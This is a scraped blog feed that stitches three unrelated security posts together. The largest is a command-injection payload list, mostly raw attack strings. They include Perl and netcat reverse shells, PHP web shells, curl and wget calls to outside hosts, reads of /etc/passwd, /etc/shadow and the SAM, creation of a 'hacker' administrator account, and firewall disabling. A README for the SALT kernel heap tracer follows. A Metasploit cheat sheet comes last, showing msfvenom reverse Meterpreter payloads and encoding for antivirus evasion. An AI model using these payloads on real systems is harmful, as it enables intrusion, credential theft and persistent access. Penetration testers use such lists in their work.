curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt
curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt
$(`curl https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)
dir
| dir
; dir
$(`dir`)
& dir
&&dir
&& dir
| dir C:\
; dir C:\
& dir C:\
&& dir C:\
dir C:\
| dir C:\Documents and Settings\*
; dir C:\Documents and Settings\*
& dir C:\Documents and Settings\*
&& dir C:\Documents and Settings\*
dir C:\Documents and Settings\*
| dir C:\Users
; dir C:\Users
& dir C:\Users
&& dir C:\Users
dir C:\Users
;echo%20'<script>alert(1)</script>'
echo '<img src=https://crowdshield.com/.testing/xss.js onload=prompt(2) onerror=alert(3)></img>'// XXXXXXXXXXX
| echo "<?php include($_GET['page'])| ?>" > rfi.php
; echo "<?php include($_GET['page']); ?>" > rfi.php
& echo "<?php include($_GET['page']); ?>" > rfi.php
&& echo "<?php include($_GET['page']); ?>" > rfi.php
echo "<?php include($_GET['page']); ?>" > rfi.php
| echo "<?php system('dir $_GET['dir']')| ?>" > dir.php
; echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
& echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
&& echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
| echo "<?php system($_GET['cmd'])| ?>" > cmd.php
; echo "<?php system($_GET['cmd']); ?>" > cmd.php
& echo "<?php system($_GET['cmd']); ?>" > cmd.php
&& echo "<?php system($_GET['cmd']); ?>" > cmd.php
echo "<?php system($_GET['cmd']); ?>" > cmd.php
;echo '<script>alert(1)</script>'
echo '<script>alert(1)</script>'// XXXXXXXXXXX
echo '<script src=https://crowdshield.com/.testing/xss.js></script>'// XXXXXXXXXXX
| echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl
; echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl
& echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl
&& echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl
echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl
() { :;}; echo vulnerable 10
eval('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
eval('ls')
eval('pwd')
eval('pwd');
eval('sleep 5')
eval('sleep 5');
eval('whoami')
eval('whoami');
exec('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
exec('ls')
exec('pwd')
exec('pwd');
exec('sleep 5')
exec('sleep 5');
exec('whoami')
exec('whoami');
;{$_GET["cmd"]}
`id`
|id
| id
;id
;id|
;id;
& id
&&id
;id\n
ifconfig
| ifconfig
; ifconfig
& ifconfig
&& ifconfig
/index.html|id|
ipconfig
| ipconfig /all
; ipconfig /all
& ipconfig /all
&& ipconfig /all
ipconfig /all
ls
$(`ls`)
| ls -l /
; ls -l /
& ls -l /
&& ls -l /
ls -l /
| ls -laR /etc
; ls -laR /etc
& ls -laR /etc
&& ls -laR /etc
| ls -laR /var/www
; ls -laR /var/www
& ls -laR /var/www
&& ls -laR /var/www
| ls -l /etc/
; ls -l /etc/
& ls -l /etc/
&& ls -l /etc/
ls -l /etc/
ls -lh /etc/
| ls -l /home/*
; ls -l /home/*
& ls -l /home/*
&& ls -l /home/*
ls -l /home/*
*; ls -lhtR /var/www/
| ls -l /tmp
; ls -l /tmp
& ls -l /tmp
&& ls -l /tmp
ls -l /tmp
| ls -l /var/www/*
; ls -l /var/www/*
& ls -l /var/www/*
&& ls -l /var/www/*
ls -l /var/www/*
<!--#exec cmd="/bin/cat /etc/passwd"-->
<!--#exec cmd="/bin/cat /etc/shadow"-->
<!--#exec cmd="/usr/bin/id;-->
\n
\n\033[2curl http://135.23.158.130/.testing/term_escape.txt?vuln=1?user=\`whoami\`
\n\033[2wget http://135.23.158.130/.testing/term_escape.txt?vuln=2?user=\`whoami\`
\n/bin/ls -al\n
| nc -lvvp 4444 -e /bin/sh|
; nc -lvvp 4444 -e /bin/sh;
& nc -lvvp 4444 -e /bin/sh&
&& nc -lvvp 4444 -e /bin/sh &
nc -lvvp 4444 -e /bin/sh
nc -lvvp 4445 -e /bin/sh &
nc -lvvp 4446 -e /bin/sh|
nc -lvvp 4447 -e /bin/sh;
nc -lvvp 4448 -e /bin/sh&
\necho INJECTX\nexit\n\033[2Acurl https://crowdshield.com/.testing/rce_vuln.txt\n
\necho INJECTX\nexit\n\033[2Asleep 5\n
\necho INJECTX\nexit\n\033[2Awget https://crowdshield.com/.testing/rce_vuln.txt\n
| net localgroup Administrators hacker /ADD
; net localgroup Administrators hacker /ADD
& net localgroup Administrators hacker /ADD
&& net localgroup Administrators hacker /ADD
net localgroup Administrators hacker /ADD
| netsh firewall set opmode disable
; netsh firewall set opmode disable
& netsh firewall set opmode disable
&& netsh firewall set opmode disable
netsh firewall set opmode disable
netstat
;netstat -a;
| netstat -an
; netstat -an
& netstat -an
&& netstat -an
netstat -an
| net user hacker Password1 /ADD
; net user hacker Password1 /ADD
& net user hacker Password1 /ADD
&& net user hacker Password1 /ADD
net user hacker Password1 /ADD
| net view
; net view
& net view
&& net view
net view
\nid|
\nid;
\nid\n
\n/usr/bin/id\n
perl -e 'print "X"x1024'
|| perl -e 'print "X"x16096'
| perl -e 'print "X"x16096'
; perl -e 'print "X"x16096'
& perl -e 'print "X"x16096'
&& perl -e 'print "X"x16096'
perl -e 'print "X"x16384'
; perl -e 'print "X"x2048'
& perl -e 'print "X"x2048'
&& perl -e 'print "X"x2048'
perl -e 'print "X"x2048'
|| perl -e 'print "X"x4096'
| perl -e 'print "X"x4096'
; perl -e 'print "X"x4096'
& perl -e 'print "X"x4096'
&& perl -e 'print "X"x4096'
perl -e 'print "X"x4096'
|| perl -e 'print "X"x8096'
| perl -e 'print "X"x8096'
; perl -e 'print "X"x8096'
&& perl -e 'print "X"x8096'
perl -e 'print "X"x8192'
perl -e 'print "X"x81920'
|| phpinfo()
| phpinfo()
{${phpinfo()}}
;phpinfo()
;phpinfo();//
';phpinfo();//
{${phpinfo()}}
& phpinfo()
&& phpinfo()
phpinfo()
phpinfo();
<?php system("cat /etc/passwd");?>
<?php system("curl https://crowdshield.com/.testing/rce_vuln.txt?method=phpsystem_get");?>
<?php system("curl https://crowdshield.com/.testing/rce_vuln.txt?req=df2fkjj");?>
<?php system("echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX");?>
<?php system("sleep 10");?>
<?php system("sleep 5");?>
<?php system("wget https://crowdshield.com/.testing/rce_vuln.txt?method=phpsystem_get");?>
<?php system("wget https://crowdshield.com/.testing/rce_vuln.txt?req=jdfj2jc");?>
:phpversion();
`ping 127.0.0.1`
& ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 &
;${@print(md5(RCEVulnerable))};
${@print("RCEVulnerable")}
${@print(system($_SERVER['HTTP_USER_AGENT']))}
pwd
| pwd
; pwd
& pwd
&& pwd
\r
| reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
; reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
& reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
&& reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
\r\n
route
| sleep 1
; sleep 1
& sleep 1
&& sleep 1
sleep 1
|| sleep 10
| sleep 10
; sleep 10
{${sleep(10)}}
& sleep 10
&& sleep 10
sleep 10
|| sleep 15
| sleep 15
; sleep 15
& sleep 15
&& sleep 15
{${sleep(20)}}
{${sleep(20)}}
{${sleep(3)}}
{${sleep(3)}}
| sleep 5
; sleep 5
& sleep 5
&& sleep 5
sleep 5
{${sleep(hexdec(dechex(20)))}}
{${sleep(hexdec(dechex(20)))}}
sysinfo
| sysinfo
; sysinfo
& sysinfo
&& sysinfo
;system('cat%20/etc/passwd')
system('cat C:\boot.ini');
system('cat config.php');
system('cat /etc/passwd');
|| system('curl https://crowdshield.com/.testing/rce_vuln.txt');
| system('curl https://crowdshield.com/.testing/rce_vuln.txt');
; system('curl https://crowdshield.com/.testing/rce_vuln.txt');
& system('curl https://crowdshield.com/.testing/rce_vuln.txt');
&& system('curl https://crowdshield.com/.testing/rce_vuln.txt');
system('curl https://crowdshield.com/.testing/rce_vuln.txt')
system('curl https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2wdf')
system('curl https://xerosecurity.com/.testing/rce_vuln.txt');
system('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
systeminfo
| systeminfo
; systeminfo
& systeminfo
&& systeminfo
system('ls')
system('pwd')
system('pwd');
|| system('sleep 5');
| system('sleep 5');
; system('sleep 5');
& system('sleep 5');
&& system('sleep 5');
system('sleep 5')
system('sleep 5');
system('wget https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2w23')
system('wget https://xerosecurity.com/.testing/rce_vuln.txt');
system('whoami')
system('whoami');
test*; ls -lhtR /var/www/
test* || perl -e 'print "X"x16096'
test* | perl -e 'print "X"x16096'
test* & perl -e 'print "X"x16096'
test* && perl -e 'print "X"x16096'
test*; perl -e 'print "X"x16096'
$(`type C:\boot.ini`)
&&type C:\\boot.ini
| type C:\Windows\repair\SAM
; type C:\Windows\repair\SAM
& type C:\Windows\repair\SAM
&& type C:\Windows\repair\SAM
type C:\Windows\repair\SAM
| type C:\Windows\repair\SYSTEM
; type C:\Windows\repair\SYSTEM
& type C:\Windows\repair\SYSTEM
&& type C:\Windows\repair\SYSTEM
type C:\Windows\repair\SYSTEM
| type C:\WINNT\repair\SAM
; type C:\WINNT\repair\SAM
& type C:\WINNT\repair\SAM
&& type C:\WINNT\repair\SAM
type C:\WINNT\repair\SAM
type C:\WINNT\repair\SYSTEM
| type %SYSTEMROOT%\repair\SAM
; type %SYSTEMROOT%\repair\SAM
& type %SYSTEMROOT%\repair\SAM
&& type %SYSTEMROOT%\repair\SAM
type %SYSTEMROOT%\repair\SAM
| type %SYSTEMROOT%\repair\SYSTEM
; type %SYSTEMROOT%\repair\SYSTEM
& type %SYSTEMROOT%\repair\SYSTEM
&& type %SYSTEMROOT%\repair\SYSTEM
type %SYSTEMROOT%\repair\SYSTEM
uname
;uname;
| uname -a
; uname -a
& uname -a
&& uname -a
uname -a
|/usr/bin/id
;|/usr/bin/id|
;/usr/bin/id|
$;/usr/bin/id
() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://135.23.158.130/.testing/shellshock.txt?vuln=13;curl http://135.23.158.130/.testing/shellshock.txt?vuln=15;\");'
() { :;}; wget http://135.23.158.130/.testing/shellshock.txt?vuln=11
| wget http://crowdshield.com/.testing/rce.txt
& wget http://crowdshield.com/.testing/rce.txt
; wget https://crowdshield.com/.testing/rce_vuln.txt
$(`wget https://crowdshield.com/.testing/rce_vuln.txt`)
&& wget https://crowdshield.com/.testing/rce_vuln.txt
wget https://crowdshield.com/.testing/rce_vuln.txt
$(`wget https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)
which curl
which gcc
which nc
which netcat
which perl
which python
which wget
whoami
| whoami
; whoami
' whoami
' || whoami
' & whoami
' && whoami
'; whoami
" whoami
" || whoami
" | whoami
" & whoami
" && whoami
"; whoami
$(`whoami`)
& whoami
&& whoami
{{ get_user_file("C:\boot.ini") }}
{{ get_user_file("/etc/hosts") }}
{{ get_user_file("/etc/passwd") }}
{{4+4}}
{{4+8}}
{{person.secret}}
{{person.name}}
{1} + {1}
{% For c in [1,2,3]%} {{c, c, c}} {% endfor%}
{{[] .__ Class __.__ base __.__ subclasses __ ()}}

References :

Testing for Command Injection (OTG-INPVAL-013)

OWASP Command Injection

WE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')

WE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'

Portswigger Web Security - OS Command Injection

Cloning an Existing Repository ( Clone with HTTPS )
root@ismailtasdelen:~# git clone https://github.com/ismailtasdelen/command-injection-payload-list.git

Cloning an Existing Repository ( Clone with SSH )
root@ismailtasdelen:~# git clone git@github.com:ismailtasdelen/command-injection-payload-list.git


SALT - SLUB ALlocator Tracer For The Linux Kernel

$
0
0

Welcome to salt, a tool to reverse and learn kernel heap memory management. It can be useful to develop an exploit, to debug your own kernel code, and, more importantly, to play with the kernel heap allocations and learn its inner workings.

This tool helps tracing allocations and the current state of the SLUB allocator in modern linux kernels.
It is written as a gdb plugin, and it allows you to trace and record memory allocations and to filter them by process name or by cache. The tool can also dump the list of active caches and print relevant information.
This repository also includes a playground loadable kernel module that can trigger allocations and deallocations at will, to serve both as a debugging tool and as a learning tool to better understand how the allocator works.
Here is the full list of commands:
> salt help
Possible commands:

filter -- manage filtering features by adding with one of the following arguments
enable -- enable filtering. Only information about filtered processes will be displayed
disable -- disable filtering. Information about all processes will be displayed.
status -- display current filtering parameters
add process/cache <arg>-- add one or more filtering conditions
remove process/cache <arg>-- remove one or more filtering conditions
set -- specify complex filtering rules. The supported syntax is "salt filter set (cache1 or cache2) and (process1 or process2)".
Some variations might be accepted. Checking with "salt filter status" is recommended. For simpler rules use "salt filter add".


record -- manage recording features by adding with one of the following arguments
on -- enable recording. Information about filtered processes will be added to the history
off -- disable recording.
show -- display the recorded history
clear -- delete the recorded history

trace <proc name> -- reset all filters and configure filtering for a specific process

walk -- navigate all active caches and print relevant information

walk_html -- navigate all active caches and generate relevant information in html format

walk_json -- navigate all active caches and generate relevant information in json format

help -- display this message
This project was developed at EURECOM as a semester project for Spring 2018.
Many thanks to my supervisors Yanick, Fabio, Emanuele, Dario, Marius, and to the rest of the S3 team that helped and followed me.

Additional Resources
Perla E, Oldani M (2010) - A Guide to Kernel Exploitation: Attacking the Core
Christopher Lameter - Slab allocators in the linux kernel
th7.cn



Metasploit Cheat Sheet

$
0
0

The Metasploit Project is a computer security project that provides information on vulnerabilities, helping in the development of penetration tests and IDS signatures.
Metasploit is a popular tool used by pentest experts.

Metasploit :

Search for module:
msf > search [regex]

Specify and exploit to use:
msf > use exploit/[ExploitPath]

Specify a Payload to use:
msf > set PAYLOAD [PayloadPath]

Show options for the current modules:
msf > show options

Set options:
msf > set [Option] [Value]

Start exploit:
msf > exploit 

Useful Auxiliary Modules

Port Scanner:
msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 10.10.10.0/24
msf > run

DNS Enumeration:
msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run

FTP Server:
msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run

Proxy Server:
msf > use auxiliary/server/socks4
msf > run

msfvenom :
The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone files and optionally encode them. This tool replaces the former msfpayload and msfencode tools. Run with ‘'-l payloads’ to get a list of payloads.
$ msfvenom –p [PayloadPath]
–f [FormatType]
LHOST=[LocalHost (if reverse conn.)]
LPORT=[LocalPort]
Example :
Reverse Meterpreter payload as an executable and redirected into a file:
$ msfvenom -p windows/meterpreter/
reverse_tcp -f exe LHOST=10.1.1.1
LPORT=4444 > met.exe
Format Options (specified with –f) --help-formats – List available output formats
exe – Executable pl – Perl rb – Ruby raw – Raw shellcode c – C code
Encoding Payloads with msfvenom
The msfvenom tool can be used to apply a level of encoding for anti-virus bypass. Run with '-l encoders' to get a list of encoders.
$ msfvenom -p [Payload] -e [Encoder] -f
[FormatType] -i [EncodeInterations]
LHOST=[LocalHost (if reverse conn.)]
LPORT=[LocalPort]
Example
Encode a payload from msfpayload 5 times using shikata-ga-nai encoder and output as executable:
$ msfvenom -p windows/meterpreter/
reverse_tcp -i 5 -e x86/shikata_ga_nai -f
exe LHOST=10.1.1.1 LPORT=4444 > mal.exe

Metasploit Meterpreter

Base Commands:
? / help: Display a summary of commands exit / quit: Exit the Meterpreter session
sysinfo: Show the system name and OS type
shutdown / reboot: Self-explanatory
File System Commands:
cd: Change directory
lcd: Change directory on local (attacker's) machine
pwd / getwd: Display current working directory
ls: Show the contents of the directory
cat: Display the contents of a file on screen
download / upload: Move files to/from the target machine
mkdir / rmdir: Make / remove directory
edit: Open a file in the default editor (typically vi)
Process Commands:
getpid: Display the process ID that Meterpreter is running inside.
getuid: Display the user ID that Meterpreter is running with.
ps: Display process list.
kill: Terminate a process given its process ID.
execute: Run a given program with the privileges of the process the Meterpreter is loaded in.
